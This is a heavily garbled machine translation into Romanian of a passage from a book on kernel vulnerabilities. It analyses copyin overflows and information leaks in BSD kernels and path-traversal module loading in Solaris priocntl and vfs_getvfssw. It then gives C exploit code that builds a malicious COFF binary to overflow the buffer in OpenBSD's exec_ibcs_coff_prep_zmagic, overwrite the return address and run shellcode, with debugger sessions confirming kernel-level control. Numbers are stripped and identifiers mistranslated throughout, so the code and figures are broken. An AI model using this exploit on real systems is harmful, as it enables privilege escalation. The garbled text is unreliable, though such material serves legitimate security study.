vulnerabilitate convertit în Următorul pseudo cod: vuln func( nt user number, char *buffer utilizator) { char stack buf[ ] dacă( user number > sizeof(stack buf) ) mergi la eroare, copyin(stack buf user buf user number), /* componentă poate sa considera Cum analogic memcpy pe nivel nuclee */ Rescriere memorie nuclee în OpenBSD sys settimer(pag v retval) struct proc *p Inregistreaza-te gol *v, register t *retval, Inregistreaza-te struct sys set timer args /* { [ ] syscallarg(u int) care, syscallarg(struct itimerval *) itv syscallarg(struct itimerval *) oltv, } */ *uap - v, struct Itimerval aitv Capitol Revărsare în miez Inregistreaza-te const struct itlmerval * tvp int s eroare; int ti lună; [ ] dacă (SCARG(uap care) > ITIMER PROF) întoarcere (EINVAL) [îndepărtat] [ ] p->p stats->p timer[SCARG(uap care)] = aitv; } splx(e), întoarcere ( ); } Acest vulnerabilitate poate sa atribuite la categorii vulnerabilități memorie miez, pantofi FIXED LIMIT ) mergi la eroare kbuf [index utilizator] = *uptr; O scurgere informație din memorie nuclee în FreeBSD int accept (td uap) struct fir *td struct Accept argumente *uap { [ ] întoarcere accept Htd uap )) Tipuri vulnerabilități nuclee static int acceptKtd aburi, compat) struct fir *td; [ ] regi ster struct accept args /* { int s, caddr t Nume: int *anamel; } */ *uap: int compat; struct filedesc *fdp: struct fişier *nfp = NUL, struct sockaddr *sa, [ ] int namelen, eroare, s, struct priză *cap, *asa de; int fd; u int steag; mtx lock(&Giant); fdp = td->td proc->p fd; dacă (uap->nume) { [patru] eroare = copyin(uap->ananamel, &namelen, dimensiunea (namelen)); daca (eroare) mergi la gata , } [îndepărtat] eroare = accept (deci, &sa); [îndepărtat] dacă (uap->nume) { /* Verifica sa len față distrugere */ [cinci] dacă (namelen > sa->sa len) namelen = sa->sa len, [îndepărtat] [ ] eroare = copiere (sa uap->nume, (u int)namelen); [îndepărtat] Apel sistemică funcții Accept() direct transmise funcții acceptl() ([!]) Cu adăugând unu adiţional zero argument Argumente transferat Cu personalizat nivel, bătătorit în structura Accept- argumente ([ ]) Structura contine: despre întreg număr, reprezentând priză; despre indicator pe structura sockaddr; despre indicator pe întreg co semn, reprezentând marimea structurilor sockaddr Primul ([patru]) funcţie accepti() copii marimea, transferat utilizator, în variabil namelen ([ ]) Aici important apoi, ce variabil este simbolic și se potrivește pentru reprezentare negativ numere Mai departe funcţie acceptl() execută numeroase operațiuni pe la șantier corect state priză priză trece în condiție așteptări nou conexiuni In cele din urma, Capitol Revărsare în miez funcţie Accept() umple nou structura sockaddr abordare ([cinci]), care în final cont va fi copiat pe personalizat nivel Marimea nou structurilor sockaddr comparat Cu argument mărimea, transmise utilizator ([cinci]); subiecte cel mai verificat, ce marimea tampon pe personalizat nivel suficient pentru depozitare structurilor La din pacate atac poate transfer către negativ sens namelen și complet deplasați-vă atu Verifica LA rezultat mare bloc memorie nuclee va fi copiat în personalizat tampon Generalizat vulnerabilitate pe pseudo cod arata aproximativ Asa de: struct datele utilizatorului { int len, /* Asa de familiar! */ char *date; b vuln func(struct datele utilizatorului *uptr) { struct kerneldata *kptr internal func(kptr), /* umplere kptr */ f( uptr->len > kptr->len ) uptr->len = kptr->len: copiere(kptr, uptr->date uptr->len), Vulnerabilitate prictl() în Solaris /* Sistemică funcţie priocntK) */ lung priocntlsys(int pc version, procset t *psp, int cmd, caddr t arg) { [îndepărtat] intrerupator (cmd) { [ ] caz PC GETCID [ ] dacă (copyin(arg, (caddr t)&pcinfo, dimensiunea (pcinfo))) eroare = [ ] scheduler load(pcinfo pc clname &scIassEpcinfo pc cid]) [îndepărtat] } int scheduler load(char *clname, sclass t *clp) { [îndepărtat] [patru] dacă (modloadCsched", clname) == - ) întoarcere (EINVAL), rw enter(clp->cl lock, RW READER) [îndepărtat] Tipuri vulnerabilități nuclee Vulnerabilitate prictl() în Solaris este excelent exemplu vulnerabilitati, condiţionat greșeli proiecta Nu mergând adânc în de prisos Detalii, hai sa sa vedem, la ce conditii ea devine posibil Sistemică funcţie priocntl destinat pentru Control de mai sus planificare ușoară proceselor (greutate ușoară proces, lwp), ce poate Rău Cum unu din ușoară proceselor principal proces, Asa de și eu insumi de bază proces Tipic stabilit copie Solaris suporturi niste clase planificare: despre real timp; despre separare timp; despre preferenţial deversare; despre fix prioritate Toata lumea aceste clase implementate în formă dinamic descărcabil module miezuri Sunt sunt în curs de încărcare sistemică funcţie priocntl, bazat pe întrebări personalizat nivel Acest sistemică funcţie de obicei primeste Două argument Cu personalizat nivel: cmd și indicator pe structura agd Vulnerabilitate legat co sens argument cmd PC GETCID, prelucrate secțiune caz [ ] Mai departe transferat utilizator indicator pe agde copiat în structura, legate de Cu clasă planificare ([ ]) copiat structura conţine toate informație referitoare la la clasă planificare: typedef struct pclinfo { id t pc cid, /* Identificator clasă */ char pc clname[PC CLNMSZ] /* Nume clasă */ int pc cinfo[PC CLIFOSZ]: /* informație clasă */ } pcinfo t, LA acest structura ne interesat argument pc clname El conţine Nume clasă planificare, A la fel relativ cale la descărcabil modul Dacă noi vrei utilizare Clasă planificare Cu Nume clasa mea, sistemică funcţie prionctl va revizui cataloage /kernel/sched/ și /usr/kernel/sched/ în in cautarea modul nuclee apelul meu Dacă modul va fi găsite, funcţie se va încărca a lui procedură căutare și descărcări guvernează funcții scheduler load ([ }) și modload ([patru]) La fel de menționat anterior, cale la modul clasă planificare este relativ; el se alătură la anticipat anumit Nume director, în care stocate Toata lumea module miezuri Dacă aderare efectuat fără verificări conditii in miscare, în Nume clasă poate sa aprinde constructie / Folosind acest vulnerabilitate, atac poate sarcină arbitrar module nuclee din diferit cataloage fişier sisteme De exemplu, argument pc clname drăguț tmp/mymod convertit în şir drăguț /kernel/sched/ / /tmp/mymod, permițând Descarca în memorie răutăcios modul miezuri LA alții nuclee la fel a fost identificat rând interesant greșeli proiecta (ptrace, vfurca și t etc ), dar noi noi credem ce depus defect este excelent exemplu vulnerabilități astfel de drăguț Pe moment scris cărți vulnerabilitate a existat și ar putea fi exploatat în toate contemporan versiuni sala de operatie sisteme solaris Capitol Revărsare în miez Noi recomanda a analiza diferit descoperit vulnerabilități nuclee și a încerca convertit lor în pseudo cod aceasta va ajuta invata sa pe cont propriu dezvălui și exploata defecte Nou vulnerabilități nuclee LA acest secțiune prezentat niste vulnerabilități nivel nuclee în major săli de operație sisteme, existent pe moment scris cărți Aici tu găsi niste nou trucuri căutare și exploatare vulnerabilitati, care anterior nu au fost publicate Revărsare în funcții exec ibcs coff prep zmagic() nuclee OpenBSD Să începem Cu considerare interfata, care Asa de și nu atras la tu Atenţie analiștilor int vn rdwr(rw vp baza len decalaj, segflg loflg cred, aresid p) [ ] enumerare uio rw rw; [ ] struct vnode *vp; [ ] caddr t baza: [patru] int len off t decalaj: enumerare uio seg segflg int loflg struct crez *cred dimensiune t *aresid; struct proc *p, { Funcţie vn rdwr() Citeste și scrie date în un obiect, depus virtual nodul (v-nod) Virtual nodul este acces la obiect în virtual fişier sistem, A la a lui creare sau utilizare indicat cale la fişier De ce considera Codul fişier sisteme, dacă ne interesat vulnerabilități miezuri? Acest vulnerabilitate fondat pe citind din fişier și conservare date în stivuibile tampon miez, A la fel pe degeaba încredere la transmise utilizator argument mărimea Vulnerabilitate nu a fost identificat în progres sistematic analize, condus Cu sala de operatie sistem OpenBSD, — probabil deoarece, ce autorii nu știa despre potenţial Probleme interfata vn rdwr() Noi recomanda cititori pe cont propriu a analiza API nuclee și a încerca dezvălui nou clase vulnerabilități nuclee în loc de A merge, la din nou și din nou cauta familiar Probleme funcții componentă și malloc Funcţie vn rdwr() Are patru argument despre care ne necesar stiu; pe odihnă poate sa pur şi simplu nu convertit Atenţie Primul argument, enumerare rw, este modul împlinire operațiuni LA dependențe din a lui valorile funcţie efectueaza citind (sau intrare) Cu v-nod Apoi ar trebui să indicator vir pe v-nod fişier, Cu care efectuat citind sau record Tre Nou vulnerabilități nuclee Multumesc argument, baza indicator, se referă pe tampon în memorie nuclee (grămadă, morman și t d ) In cele din urma, întreg argument len defineste marimea bolti date, pe care indica argument baza Dacă argument rw egală UIO READ, funcţie vn rdwr Citeste len octeți din fişier și salvează lor în tampon nuclee baza La rw=UIO WRITE funcţie scrie len octet în fişier din tampon în memorie nuclee baza Natural, Operațiune UIO READ de multe ori este sursă revărsare, deoarece ce ea pe a lui natură asemănătoare operațiuni sursă() DIN un alt mână, Operațiune UIO WRITE conjugat Cu scurgere informație, caracteristică pentru a copia() La fel de mereu, după Identificare potenţial Probleme și identificarea nou clasă defecte Securitate nivel nuclee ar trebui să profită utilitate cscope pentru vizionare Total copac iniţială textele miezuri Dacă la fel iniţială textele nu e disponibil ar trebui să merge la deținere analiză pe binar nivel Cu aplicarea IDA Pro După mic de statura analiză funcții vn rdwr în miez OpenBSD noi găsite amuzant defect miez, a existat în toate versiuni OpenBSD pe moment scris cărți La scapă de din -l necesar recompila nucleu Cu excepție niste funcții compatibilitate Pe practică majoritate administratori frunze funcții compatibilitate inclus chiar la independent compilare miezuri Vulnerabilitate Vulnerabilitate este în funcții exec ibcs coff prep zmagic() Natural, pentru înţelegere a ei esență necesar primul познакомиться Cu cod int exec ibcs coff prep zmagic(p, gres, fp ap) struct proc *p, struct pachet exec *epp; struct coff filehdr *fp, struct coff aoutdr *ap, { int eroare: u long decalaj lung dsize badr, bsize, [ ] struct coff scnhdr SH /* Pregătirea comenzi pentru segment text */ [ a] eroare = coff find sect on(p epp->ep vp, fp &SH, COFF STYP TEXT) [îndepărtat] NEW VMCMD(&epp->ep vmcmds vmcmd map readvn epp->ep tsize epp->ep taddr, epp->ep vp decalaj, VM PROT READ|VM PROT EXECUTE) /* Pregătirea comenzi pentru segment date */ [ b] eroare = coff find section(pag epp->ep vp, fp &SH, COFF STYP DATA): [îndepărtat] NEW VMCMD(&epp->ep vmcmds vmcmd map readvn dsize epp->ep daddr epp->ep vp decalaj Capitol Revărsare în miez VM PROT READ|VM PROT WRITE|VM PROT EXECUTE); /* Pregătirea comenzi pentru segment bss */ [îndepărtat] /* Descarca orice sunt comune biblioteci */ [ s] eroare = coff find section(pag epp->ep vp, fp, &SH COFF STYP SHLIB), dacă (eroare) { dimensiune t şedere, struct coff slhdr *shldr; [ ] char buf[ ] *bufp; /* FIXME */ [patru] int len = SH mărime s, pathjndex entryjen; /* DPRINTF(("COFF shlib mărimea £d decalaj %d\n” sh s size sh s scnptr)): */ [cinci] eroare = vn rdwr(UIO READ, epp->ep vp, (caddr t) buf len SH s scnotr UIojYSSPÂCE lojDELOCKAT, p->p ucred, &rezid p) Funcţie exec ibcs coff prep zmagic() răspunsuri pe creare medii împlinire binar fișiere tip COFF ZMAGIC Ea numit funcţie exec ibcs cdff makecdms, care controale, este dacă dat fişier executabil modul în format Coff Cu exceptia A merge, funcţie verificări "magic număr", în mai departe folosit pentru Identificare specific manipulator, responsabil pe Instruire virtual memorie pentru proces LA binar module tip ZMAGIC acest manipulator este funcţie exec ibcs coff prep zmagic() Cheltuieli reaminti, ce punct Intrare, prin care în final cont realizat aceste functii, este sistemică funcţie exeziv, de sprijin și emulând variat tipuri executabil formate (ELF, COFF și de specialitate formate săli de operație sisteme familii Unix) Pentru apel funcții exec ibcs coff prep zmagic() necesar performant fişier în format COFF (subtip ZMAGIC) Mai departe noi crea astfel de fişier și implementează vector revărsare în răutăcios binar fişier In orice caz, nu noi vom a alerga în redirecţiona și primul hai să ne dăm seama în esență vulnerabilități Cale programe la vulnerabilități arata asa de Personalizat modul: x a mov $ x b,^eax Ox a int x USD eu eu V Modul sâmburi: [ ] int sys execve(p, v retval) regi ster struct proc *p gol *v, register t *retval [îndepărtat] Nou vulnerabilități nuclee Dacă ((eroare = check exec(p, &rask)) != ) { mergi la freehdr, } [îndepărtat] } LA matrice execsw stocate structurilor execsw, reprezentând variat tipuri executabil module Funcţie check exec() trece peste elemente matrice și cauze functii, responsabil pe Identificare niste executabil formate LA indicator pa funcţie es check a intrat adresa verificare modul pentru toata lumea manipulator executabil format struct execsw { u nt es hdrsz; /* Marimea antet pentru dat format */ exec makecmds fcn es check /* Funcţie verificări format */ } struct execsw excsw[] = { [îndepărtat] # fdef KERN DO ELF {sizeof(Elf Ehdr) exec elf makecmds } /* Format elf */ #endif [îndepărtat] # fdef COMPAT IBCS { COFF HDR SIZE exec bcs coff makecmds }, /* Format coff */ #endif [îndepărtat] check exec(p, epp) struct proc *p struct pachet exec *epp; [îndepărtat] noua eroare = (*execsw[i] es check)(p, epp) Atent da-i seama în volum, ce merge mai departe în acest cod Format COFF identificat element C MPAT IBCS structurilor execsw, și dat funcţie (es check = exec ibcs coff makecmds) în final în cele din urmă transmite Control pentru executabil module tip ZMAGIC exec ibcs coff prer zmagic() } V int exec ibcs coff makecmds(pag epp) struct proc *p struct pachet exec *epp { [îndepărtat] dacă (COFF BADMAG(fp)) întoarcere ENOEXEC Macro controale, Are dacă performant modul format Coff, și dacă Are — performanţă continuă [îndepărtat] intrerupator (ap->a magic) { [îndepărtat] Capitol Complet în miez caz COFF-ZMAGIC eroare = exec bcs coff prep zmagic(p, epp, fp, ap), pauză: [îndepărtat] V int exec bcs coff prep zmagic(p, epp, fp, ap) struct proc *p, struct pachet exec *epp; struct coff f ehdr *fp: struct coff outdr *ap, hai sa hai sa analizam acest funcţie și sa incercam a intelege, Cum la fel în final cont apare revărsare tampon în grămadă LA punct [ ] structura coff scnhdr defineste informație descriind secțiune executabil modul COFF (zb/go- abil secțiuni); acest structura este umplut funcţie coff find section() ([ a], [ b], [ s]) în dependențe din tip secțiuni LA binar fișiere COFF ZMAGIC a iesi in evidenta titluri secțiuni COFF STYP TEXT ( text), COFF STYP DATA ( date) și COFF STYP SHLIB (sunt comune biblioteci) În timp împlinire niste o singura data numit funcţie coff find section() Structura coff scnhdr este umplut date antet secțiuni din binar modul, și date secțiuni afișat în virtual abordare spaţiu proces macro NEW VMCMD Apoi titlu, referitoare la la secțiuni segment text, citit în SH (coff scnhdr) ([ a]) După mai multe preliminar verificări și tehnica de calcul macro NEW VMCMD execută real afişa secțiuni pe memorie Pentru segment date ([ b]) creată nou regiune memorie Pe al treilea etapă citit antet secțiuni ([ s]) Cu informație ambii toate legat general biblioteci după ce biblioteci succesiv afișat pe abordare spaţiu executabil modul După A merge Cum antet secțiuni shlib va fi complet citit, date secțiuni sunt citite din v-nod executabil modul Mai departe funcţie vn rdwr() numit Cu mărimea, primit din antet secțiuni ([patru]), pentru static tampon în grămadă, marimea pe cine este Total octet ([patru]) LA rezultat poate întâmpla tipic revărsare tampon De fapt Aici efectuat citind în static tampon în grămadă pe bază dat utilizator mărimea și din personalizat date Deoarece noi Poate sa construi fictiv antet secțiuni COFF co toata lumea necesar titluri secțiuni, și cel mai principal — Cu rubrica secțiuni a shlib, devine posibil revărsare tampon Dacă cere camp mărimea Mai mult octet, aceasta este va conduce la revărsare grămadă OpenBSD și implementare personalizat cod în inel (modul nuclee) Tine minte anterior acest defect a fost numit "amuzant"? uite mai atent pe şir [ ], în care a anunţat local tampon nuclee char buf[ ]: /* FIXME */ Glumă ns atât de fierbinte, dar Toata lumea egală amuzant Noi speram dezvoltatori OpenBSD Toata lumea- ta-ki se va face apoi, ce ei mergeau do acum mult timp LA Următorul secțiune noi Să mergem mai departe la considerare vulnerabilități în sala de operatie sistem Cu închis iniţială textele La fel în limba germana voi prodemopst- Nou vulnerabilități nuclee ried niste sunt comune trucuri exploatare vulnerabilități nuclee și scris implementate cod Vulnerabilitate enumerare descărcabil module nuclee vfs getvfssw() în Solaris La fel de și inainte de noi să începem Cu considerare vulnerabil cod Primul sa incercam a intelege, ce la fel merge mai departe A apoi Să mergem mai departe la detaliat analiză vulnerabilități struct vfssw * vfs getvfssw(car *tip) struct vffsw *vswp: char *modname; int rval RLOCK VFSSW(): Dacă ((vswp = vfs getvfsswbyname(tip)) == nul) { RUNLOCK VFSSW(), WLOCK VFSSW() dacă ((vswp = cfs getvfsswbyname(tip)) == nul) { [ ] dacă ((vswp = aloca vfssw(tip)) == nul) { WUNLOCK VFSSW() întoarcere (NUL), WUNLOCK VFSSW(), RLOCK VFSWO } [ ] modname = vfs to modname(tip) in timp ce (!VFS INSTALLED(vswp)) { RUNLOCK VFSSW(): dacă (rootdir != nul) [ ] rval = modloadC'fs", nume mod), [îndepărtat] } LA sala de operatie sistem Solaris mare parte funcţionalitate nuclee (în volum inclusiv și a sustine variat fişier sisteme) implementate în formă dinamic module miez, descărcabil pe măsura nevoie După ce a primit Anchetă pe serviciu fişier sisteme, care nu a fost anterior încărcat în spaţiu miez, nucleu caut corespunzător dinamic modul fişier sisteme Modul Se încarcă din unu din cataloage module și mânere Anchetă Acest beton vulnerabilitate, Cum și vulnerabilitate priocntl, face sala de operatie sistem Descarca acordat utilizator modul nuclee (în dat exemplu — modul, reprezentând fişier sistem) și subiecte cel mai a primi maxim privilegiu pentru împlinire cod pe nivel miezuri Nucleu Solaris magazine date despre încărcat fişier sisteme în special masa De fapt masa este tu matrice structurilor vfssw t: typedef struct vfssw { char * vsw name, /* Nume tip fişier sisteme */ int (*vsw imt)(struct vfssw *, int) Capitol Revărsare în miez /* Funcţie initializare */ struct vfsops *vsw vfsops, /* Vector operațiuni fişier sisteme */ int vsw flag, /* Steaguri */ } vfssw t: Funcţie vfs getfssw() trece peste conţinut matrice vfssw[] în in cautarea ele*] poliţist Cu potrivit sens vsw name (definit simbolic şir tip, transferat funcții) Dacă potrivit element nu găsite, funcţie vfs getvfssw() evidențiază memorie sub nou intrare în matrice vfssw[] ([ ]) și cauze funcţie transformări ([ ]), care limitat analiză argument tip pentru niste linii La exploatare vulnerabilități acest modul muncă nu se aplică In cele din urma, funcţie produce încărcare automată fişier sisteme provocare funcții modload ([ ]) LA proces analiză nuclee noi descoperit ce Două sistemică funcții Solaris cauză funcţie vfs getfssw() co sens tip, transmise utilizator, Sens convertit în Nume modul, descărcabil din catalog /kernel/fs/ sau /usr/kernel/fs/ La fel de și în anterior caz, interfata modload atacat simplu tranziții pe directoare, ce dă atacator posibilitate împlinire cod în modul miezuri Asa de, în proces analiză în sistemică funcții montură și sysfs noi dezvăluit vulnerabilitate, care poate sa cu succes exploata (despre volum, Cum aceasta este se face spuse în capitol ) Considera Două posibil cale apel vfs getvfssw() Cu intrare date, controlat utilizator Sistemică funcţie sysfs() Primul cale apel vfs getvfssw() Cu date, furnizate utilizator, bazat pe apel sistemică funcții sysfs(): int sysfsdnt opcode lung al lung a ) int eroare, intrerupator (opcode) { caz GETFSIND eroare = sysfsind((car *)al) [îndepărtat] V static int sysfsind(char *fsname) { /* * transformare identificator fs în index structurilor vfssw */ struct vfssw *vswp, char fsbuf[FSTYPSZ] int retval: dimensiune t len = retval = copyinstr(fsname fsbuf, FSTYPSZ &len) [îndepărtat] Rezultate /* * Găsi în masa vfssw identificator fs * și întoarcere a lui index */ dacă ((vswp = vfs getvfssw(fsbuf)) != nul) { [îndepărtat] Sistemică funcţie montură() Sistemică funcţie montură() se deschide un alt cale la apel funcții vfs getvfssw() Cu date, furnizate utilizator: int montare(car *spec, char *dir int steaguri, char *fstype, char *dataptr, int datalen) [îndepărtat] ua spec = specificație, ua dir = dir, ua steaguri = steaguri: ua fstype = fstype, ua dataptr = dataptr, ua datalen = datalen [îndepărtat] eroare = mount(NULL, &ua,vp, Credo, &vfsp): [îndepărtat] V int domount(char *fsname, struct monta *uap, vnode t *vp, struct cred *credp struct vfs ((vfspp) [îndepărtat] eroare = copyinstr(uap->fstype, Nume FSTYPSZ, &n): [îndepărtat] dacă ((vswp = vfs getvfssw(nume)) == nul) vn vfsunTock(vp) [îndepărtat] Sincer zicală noi nu verificat Toata lumea interfețe miez, folosind funcţie vfs getvfssw(), dar, mai repede Total, alții oportunități exploatare vulnerabilități Nu In orice caz, încerca a analiza Probleme, legate de Cu modload(); Poate, pentru tine a reusi găsi alte vulnerabil interfețe Rezultate LA acest capitol prezentat metode căutare nou vulnerabilități în Două săli de operație sisteme, OpenBSD și solaris Temă vulnerabilități nuclee suficient complicat asa de metode lor exploatare considerată în separa capitol trece peste la a ei numai apoi, când tu veți în complet măsura a intelege concepte, descris în acest capitol, și Bun da-i seama în prezentat Aici vulnerabilități CAPITOL Exploatare vulnerabilități nuclee LA capitol au fost detaliu descris Două serios vulnerabilități miezuri LA acest capitol noi hai sa ne ocupam lor practic exploatare Acasă problemă la exploatare vulnerabilități (și inainte de Total vulnerabilități sâmburi) este lor accesibilitate Să începem Cu vulnerabilități nuclee OpenBSD Vulnerabilitate exec ibcs coff prep zmagic() La a primi acces la vulnerabilități exec ibcs coff prep zmagic(), necesar dezvolta cel mai puţin posibil binar fișier COFF LA acest secțiune vorbire va merge despre volum, Cum aceasta este do Noi sa ne cunoastem Cu niste structuri COFF, a completa lor necesar date și salva în fictiv fișier COFF Pentru primind vulnerabil cod fişier ar trebui să conține niste titluri, în volum inclusiv antet fişier, antet afară și titluri secțiuni Dacă cu toate că ar unu din enumerate secțiuni va fi absent, anterior funcții prelucrare format COFF va reveni Codul greșeli, și noi nu nu a ajunge vulnerabil funcții vn rdwr Minim structura fictiv executabil fișier COFF arata Asa de: antet fişier antet afară antet secțiuni ( text) antet secțiuni ( date) antet secțiuni ( shlib) Următorul program creează fictiv performant modul COFF, suficient pentru transmitere management prin substituiri adrese întoarcere Despre exploatare vulnerabilități spuse Mai departe, A Aici hai sa ne ocupam creare executabil fişier în format Coff: Vulnerabilitate exec ibcs coff pregătire zmagic() - obsd exl c /** Creare fictiv executabil Modulul COFF Cu mare secțiune shlib **/ #include #include #include # include #include #include #include nesemnat char shellcode[] = „\xcc\xcc”, /* Pa numai int (depanare întrerupe) */ #defini ZERO(p) memset(&p, x , slzeof(p)) /* * antet fişier COFF */ struct coff filehdr { u short fjnagic /* magic număr */ u short f nscns /* Cantitate secțiuni */ lung f timdat /* Temporar eticheta */ lung f symptr, /* Părtinire Mese personaje */ lung f nsyms, /* Număr înregistrări în masa personaje */ u short f opthdr; /* Marimea opțional antet */ u short f steaguri; /* Steaguri */ /* fjnagic */ #defini COFF MAGIC I x c /* f steaguri */ ! #def ne COFF F RELFG x #defini COFF- "F" EXEC x #defini COFF- „f” „LNNO x #defini COFF- „f” — LSYMS x #defini COFF" "f" „SWABD x #defini COFF-'F AR WR x #defini COFF-J AR WR x /* * Sistemică antet COFF */ struct coff mic de statura mic de statura lung lung lung lung lung aoutdr { ajnagic, a vstamp a tsize, a dsize, a bsize, o intrare A tstart Capitol Exploatare vulnerabilități nuclee lung a dstart }: /* magic număr */ #defini COFF ZMAGIC /* * antet secțiuni COFF */ struct coff scnhdr { char s name[ ] lung s paddr lung s vaddr; lung s size; lung s scnptr lung s relptr; lung sjnnoptr u short s nreloc; u short s nlnno }: lung s steaguri /* s steaguri */ #defini COFF STYP TEXT x #defini COFF STYP DATA x #defini COFF STYP SHLIB x int principal (int argc char **argv) { u int fd depanare = u char *ptr, *shptr, u long *lptr decalaj; char *args[] = { " /ibcs own", NUL}, char *envs[] = { „RIP=theo”, NUL}; // structurilor COFF struct coff filehdr fhdr, struct coff outdr ahdr, struct coff scnhdr scnO, seni, scn ; dacă(argv[l]) { f(!strncmp(argv[l], "-v", )) depanare = , altfel { printf("-v verboroasă steag numai\n"), ieșire ( ) ZERO(fhdr) fhdr fjnagic = COFF MAGIC I , fhdr f nscns = //TEXT, DATE, SHLIB fhdr f timdat = Oxdeadbeef fhdr f symptr = x fhdr f nsyms = Vulnerabilitate execJbcs coff pregătire zmagic() fhdr f opthdr = dimensiunea(ahdr) // Marimea antet OUT fhdr Jflags = COFF F EXEC: ZERO(ahdr); ahdr ajnagic = COFF ZMAGIC: ahdr ajslze = ahdr a dsize = , ahdr a bsize = : ahdr o intrare = x : ahdr aj:start = , ahdr a dstart = : ZERO (scnO) memcpy(&scn s name " text", cinci), scn s paddr = x scn s vaddr = x : scn s size = : // Părtinire segment text scnO s scnptr = dimensiunea (fhdr) + dimensiunea(ahdr) + (dimensiunea(scn )* ) scnO s relptr = scnO sjnnoptr = scn s nreloc = : scnO s nlnno = scnO s steaguri = COFF STYP TEXT: ZERO(scnl), memcpy(&scnl s name " date", cinci), seni s paddr = x - seni s vaddr = x - seni s size = , // Părtinire segment date seni s scnptr = dimensiunea (fhdr) + dimensiunea(ahdr) + (dimensiunea(scn )* ) + , seni s relptr = seni sjnnoptr = seni s nreloc = , seni s nlnno = Sony s steaguri = COFF STYP DATA ZERO(scn ), memcpy(&scn numele ei, " shlib" ), scn s paddr = , scn s vaddr = , // Vector preaplin! scn s size = oxbo, /* Părtinire din start tampon inainte de salvat eir */ // Părtinire segment shlib scn s scnptr = dimensiunea (fhdr) + dimensiunea(ahdr) + (dimensiunea(scn )* ) + ( * ) scn s relptr = , scn sjnnoptr = scn s nreloc = scn s nlnno = scn sjlags - COFF STYP SHI IB Capitol Exploatare vulnerabilități nuclee ptr = (car *) malloc(s zeof(fhdr) + dimensiunea(ahdr) + (dimensiunea(scn )* ) + * ): memset(ptr oxcc, dimensiunea (fhdr) + dimensiunea(ahdr) + (dimensiunea(scn )* ) + * ), memcpy(ptr, (car *) &fhdr, sizeof(fhdr)); decalaj = sizeof(fhdr); memcpy((car *) (ptr+offset), (car *) &ahdr, dimensiunea(ahdr)): decalaj += dimensiunea(ahdr): memcpy((car *) (ptr+offset), (car *) &scn dimensiunea (scnO)): decalaj += dimensiunea (scnO): memcpy((car *) (ptr+offset), (car *) &scnl, slzeof(scnl)): decalaj += slzeof(scnl), memcpy((car *) (ptr+offset), (car *) &scn , dimensiunea(scn )): iptr = (u long *) ((car *)ptr + dimensiunea (fhdr) + dimensiunea(ahdr) - (dimensiunea(scn )* ) + ( * ) + Oxbo - ): shptr = (car *) malloc( ); Dacă (depanare) printf("sarcina utila adr x% x\n", shptr), memset(shptr oxcc, ), *lptr++ = oxdeadbeef, *lptr = (u lung) shptr; memcpy(shptr shellcode, sizeof(shellcode)-l), deconectațiC /ibcs own"), /* Îndepărtarea resturi din trecut împlinit dacă((fd = deschis(" /ibcs own", O CREAFO RDWR, )) bash- b# sysctl -w ddb console=l ddb consolă- l-> Primul comanda sysctl melodii ddb pe lansa la descoperire "panică" state miez, A al doilea permite în orice moment a primi acces la ddb Cu console presare combinatii chei Esc+Ctrl+Alt bash- b# objdump -d start-address= xd ac Stop- adresa= xd c \ > /bsd | Mai mult /bsd fişier format A out- -netbsd Dezasamblarea de secțiune text d ac : d ac - Apăsaţi %ebp d ac e mov %esp debp d ac b ec bc sub $ xbc ^esp d ac Apăsaţi %edi [îndepărtat] d af d c părăsi d af e c ret XC bash- b# objdump -d start-address= xd ac Stop- adresa= xd af e\ > /bsd | grep vn rdwr d aef e b d ff caii d fca LA acest exemplu xd aef — adresa funcții vn rdwr Pentru calculele distante între salvat abordare întoarcere și tampon în grămadă necesar instalare Control puncte în prolog (punct intrare) funcții execjbcs coff prep zmagic() și funcții vn rdwr() CTRL+ALT+ESC bash- b# Oprit la Depanator+ x părăsi ddb> x/ xd ac exec ibcs coff prep zmagi c pushl %ebp ddb> x/i xd aef exec ibcs coff prep zmagic+ x b caii vn rdwr ddb> pauză xd ac ddb> pauză xd aef ddb> cont Capitol Exploatare vulnerabilități nuclee bash- b# /obsd exl Punct de întrerupere la exec ibcs coff prep zmagic- pushl ^ebp ddb> x/x $esp,l xd c c- dO a c ''salvat întoarcere abordare la- xd c c ddb> x/ xd a c exec i bcs coff makecmds+ x • movl %eax,%ebx ddb> x/ xd a c - cinci exec ibcs coff makecmds+ x c: caii exec bcs coff prep zmagic ddb> cont Breakpolnt la exec bcs coff prep zmagic+ x b: caii vn rdwr ddb> x/x $esp, Oxd b O d c c d bb (baza argument la vn rdwr) ddb> x/x $esp xd b ddb> xd b -d c c ddb> xd b d bbO | > Adresa 'char buf[ ]' ddb> x/x $ebp xd c :d c > salvat £ebp ddb> xd c c dO a c > salvat %eip |-> Adresa în grămadă, pe la care stocate adresa întoarcere LA conventii apel x (în presupunere ce indicator cadru nu a fost exclus, apoi mânca -fomit frame pointer) indicator bazele mereu se referă pe poziţie grămadă, în care stocate indicator cadru sfidător laturi și indicator comenzi Pentru calculele distante între tampon și salvat sens %eir efectuat Următorul Operațiune: ddb> prinţ xd c c - Oxd bbO as ddb> cizme sincronizare NOTĂ - - Comanda cizme sincronizare reîncarcă sistem Distanţă între abordare, pe la care stocate salvat adresa întoarcere, și stivuibile tampon este (Ohae) octeți Instalare marimea secțiuni date egal (Ohhhh) în antet secțiuni shlib, noi primim Control de mai sus abordare întoarcere Înlocuire adrese întoarcere și interceptare management După calculele locații adrese întoarcere pe relație la debordant tampon Următorul fragment obsd exl c devine Mai mult de inteles [ ] iptr = (u long *) ((car *)ptr + dimensiunea (fhdr) + slzeof(ahdr) + \ (dimensiunea(scn )* ) + ( * ) + Oxbo - ), [ ] shptr - (car *) malloc( ), Vulnerabilitate exx ibcs coff pregătire zmagic() Dacă (depanare) printfCpayload adr: OxOx\n", shptr); memset(shptr, oxcc ); *lptr++ = Oxdeadbeef [ ] *lptr = (u lung) shptr: De fapt în [ ] noi mutare indicator Lptr în poziţie acestea date în secțiuni, care voi inlocui salvat indicator bazele și adresa întoarcere După împlinire acest operațiuni în morman iese în evidență tampon [ ], proiectat pentru depozitare cod (cm Mai departe) După acest patru octeți date în secțiuni, destinat pentru substituiri adrese întoarcere, la curent abordare tampon în morman, dedicat în personalizat spaţiu ([ ]) Control va fi interceptat și transferat în tampon personalizat modul, umplut numai depanare întreruperi int aceasta va conduce la revitalizare depanator bash- b# /obsd exl -v încărcătură utilă adr: x Oprit la x int dolari ddb> x/ $e p x - int dolari x int dolari x : int dolari Weekend date depanator nuclee spectacol ce noi primit deplin Control de mai sus implementare Cu privilegii nuclee (SEL KPL) ddb> spectacol registre este x ds x ebp Oxdeadbeef eip cs x > Adresa 